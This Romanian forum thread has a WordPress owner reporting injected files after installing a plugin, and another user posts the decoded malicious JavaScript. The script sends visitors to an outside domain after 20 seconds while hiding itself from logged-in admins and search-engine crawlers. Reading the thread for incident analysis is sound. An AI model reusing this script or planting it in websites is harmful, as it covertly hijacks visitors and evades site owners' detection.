Decode code var

Dupa ce am gasit pe un site wordpress codul de mai sus, am luat la puricat site-ul.
Am descarcat worspress original si facut manual comparatie. Si uite asa am gasit fisiere in plus in wp-include si wp-admin
Acestea sunt atasate.
@Ovidiu Bokar @Naruto9 @Susp3kt si alti programatori va rog sa aruncati o privire in fisiere sa imi spuneti ce face si cum au aparut acolo.

la fel si oricare dintre voi cautati aceste fisiere pe site-ul vostru wordpress.
 

Atașamente

  • wp files.zip
    114,2 KB · Vizualizări: 8
categoric e hack, iti recomand sa stergi.

Rezultatul e:
HTML:
(function asd() {
  var w_location = 'http://vyhub.com/css/css/';
  var cookie = 'yYjra4PCc8kmBHess1ib';

  function start() {
    var cookies = document.cookie || '';
    if (cookies.indexOf(cookie) !== -1) {
      return;
    }
    if (cookies.indexOf('wp-settings') !== -1) {
      return;
    }
    if (localStorage.getItem(cookie) === '1') {
      return;
    }
    var uagent = navigator.userAgent;
    if (!uagent) {
      return;
    }

    uagent = uagent.toLowerCase();
    if (uagent.indexOf('google') !== -1
        || uagent.indexOf('bot') !== -1
        || uagent.indexOf('crawl') !== -1
        || uagent.indexOf('bing') !== -1
        || uagent.indexOf('yahoo') !== -1) {
      return;
    }

    setTimeout(function() {
      setCookie(cookie, '123', 730);
      localStorage.setItem(cookie, '1');
      window.location = w_location;
    }, 20 * 1000);
  }
  function setCookie(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? '' : '; expires=' + exdate.toUTCString());
    document.cookie = c_name + '=' + c_value;
  }

  var readyStateCheckInterval = setInterval(function() {
    if (document.readyState === 'complete'
        || document.readyState == 'interactive') {
      clearInterval(readyStateCheckInterval);
      start();
    }
  }, 10);

}());
 
se intinde la toate fisierele.
Faza este ca sunt diferite, plus vreau sa stiu cum au ajuns.
Azi am instalat un plugin si ma gandesc ca este de la acesta. Nu am verificat daca erau si inainte acele fisiere.
 
@AlexH trimitemi siteul si pot sa verific ce pluginuri ai pe el. Dar deobicei astefel de atacuri sunt de la nesecurizarea pluginurilor sau instalare de pluginuri care nu sunt create cu gandul la securitate.
 
Site este curat acum si nu detin multe plugin sau theme ******.
Acesta e pluginul care l-am instalat si dupa care am vazut alea in sursa.
 

Atașamente

  • 03gzlyz1b.zip
    8,4 KB · Vizualizări: 2
Loading...
Back
Sus